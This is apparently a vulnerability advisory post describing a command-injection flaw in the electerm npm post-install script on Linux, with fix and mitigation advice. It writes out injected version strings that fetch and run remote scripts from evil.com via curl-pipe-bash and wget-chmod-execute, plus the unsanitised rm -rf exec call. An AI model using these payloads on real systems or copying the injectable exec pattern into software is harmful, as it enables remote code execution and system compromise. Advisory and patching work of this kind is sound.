Listen to this Post
The vulnerability exists in `github.com/electerm/electerm/npm/install.js` at line 130. The `runLinux()` function fetches remote release metadata (e.g., version string or release name) from the project’s update server. An attacker who controls that server or performs a MITM attack can inject malicious shell metacharacters into the version string. This string is then concatenated directly into an `exec(“rm -rf …”)` command without any sanitization or validation. Specifically, the vulnerable line constructs a command like exec('rm -rf ./temp/' + remoteVersion). Because `remoteVersion` is attacker-controlled, inserting backticks, $(), ;, &&, or `||` allows arbitrary command execution. For example, a version string `1.0.0; curl http://evil.com/backdoor.sh | bash` would execute the curl and bash commands as the user running npm install -g electerm. The `exec` call uses the system shell, so all shell operators work. This leads to full remote code execution on the Linux machine where the installation occurs. The attack requires no privileges beyond controlling the update server’s response or poisoning DNS/cache. The vulnerability is triggered only during the npm post-install script on Linux systems. Windows and macOS versions of the install script use different code paths and are not affected. The flaw was introduced in an earlier commit and remained undetected until reported. The fix removes the shell invocation by using `fs.rm` or `child_process.execFile` with arguments array, or by validating the version string against a strict regex.
dailycve form:
Platform: Linux
Version: All prior to 59708b3
Vulnerability: Command Injection
Severity: Critical
date: 2025-04-24
Prediction: Already patched (2025-04-20)
What Undercode Say:
Simulate malicious version string
malicious_version="1.0.0; echo 'Compromised' > /tmp/pwned"
Vulnerable exec call (reconstruction)
exec("rm -rf ./temp/" + malicious_version)
Proof of concept using curl (requires attacker-controlled update server)
Attacker serves version: "1.0.0; curl http://evil.com/shell.sh | bash"
Exploit:
Attacker sets up rogue update server responding with version string 1.0.0; wget -O /tmp/x http://evil.com/x && chmod +x /tmp/x && /tmp/x. When victim runs npm install -g electerm, the malicious string is injected into exec("rm -rf ..."). The shell executes the injected commands, downloading and running arbitrary payload. No user interaction beyond installation.
Protection from this CVE:
Update to electerm version containing commit `59708b38c8a52f5db59d7d4eff98e31d573128ee` (already published to npm). If updating is impossible, avoid running `npm install -g electerm` on Linux until patched. Use `–ignore-scripts` flag: npm install -g electerm --ignore-scripts. Manually review `install.js` and replace `exec` with `execFile` or fs.rm.
Impact:
Arbitrary command execution during npm install, leading to full system compromise, file tampering, backdoor installation, lateral movement, and theft of development/runtime assets. Affects all Linux users installing electerm globally.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

